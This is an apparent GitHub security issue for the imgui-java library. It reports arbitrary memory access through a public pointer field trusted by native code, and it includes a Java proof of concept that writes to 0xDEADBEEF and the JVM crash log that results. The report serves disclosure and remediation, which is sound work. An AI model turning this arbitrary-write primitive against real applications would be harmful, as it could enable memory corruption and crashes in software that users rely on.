[Security] Arbitrary Memory Access via Public Pointer Field

[Sp1d3rL1]

Version

latest

What happened?

Remediate a security vulnerability.

I’ve prepared a detailed vulnerability report, which can be found at link. Please refer to it for the reproduction steps and remediation plan.

Reproduction

The following Java code triggers a segmentation fault (or assertion failure) by writing to an invalid memory address (0xDEADBEEF), proving that the native layer trusts the user-supplied pointer.

Environment: macOS/Linux, JDK 21 .
Build: Build the project normally using ./gradlew build (or generateLibs).
Exploit Code (ReproduceImgui.java as following):

public class ReproduceImgui {
    static {
        // Load the library generated by the build
        try {
            System.loadLibrary("imgui-java64"); 
        } catch (Throwable e) {
            e.printStackTrace();
            System.exit(1);
        }
    }
    public static void main(String[] args) {
        System.out.println("   ImGui-Java Arbitrary Memory Access PoC");
        try {
            ImGui.createContext();

            long maliciousPtr = 0xDEADBEEFL;
            System.out.println("[*] Creating ImGuiIO wrapper with malicious ptr: 0x" + Long.toHexString(maliciousPtr));
            
            // VULNERABILITY: 'ptr' field is trusted by native layer
            ImGuiIO badIO = new ImGuiIO(maliciousPtr);
            
            System.out.println("[*] Triggering native dereference...");
            // Native method calls: ((ImGuiIO*)ptr)->ConfigFlags = 0;
            // Writes 0 to 0xDEADBEEF -> CRASH
            badIO.setConfigFlags(0);
        } catch (Throwable t) {
            t.printStackTrace();
        }
    }
}

Compiling and running the above code against the imgui-java library results in a native crash.

Relevant log output

[+] Original IO Ptr: 0x12805c808
[*] Creating ImGuiIO with malicious ptr: 0xdeadbeef
[*] Triggering native dereference...
#
# A fatal error has been detected by the Java Runtime Environment:
#
#  SIGSEGV (0xb) at pc=0x0000000126243838, pid=47777, tid=4611
#
# JRE version: Java(TM) SE Runtime Environment (21.0.3+7) (build 21.0.3+7-LTS-152)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (21.0.3+7-LTS-152, mixed mode, sharing, tiered, compressed oops, compressed class ptrs, g1 gc, bsd-aarch64)
# Problematic frame:
# C  [libimgui-java64.dylib+0x2f838]  Java_imgui_ImGuiIO_nSetConfigFlags+0x48
#
# No core dump will be written. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# /Users/spider/Temp/imgui-java/imgui-binding/hs_err_pid47777.log
#
# If you would like to submit a bug report, please visit:
#   https://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.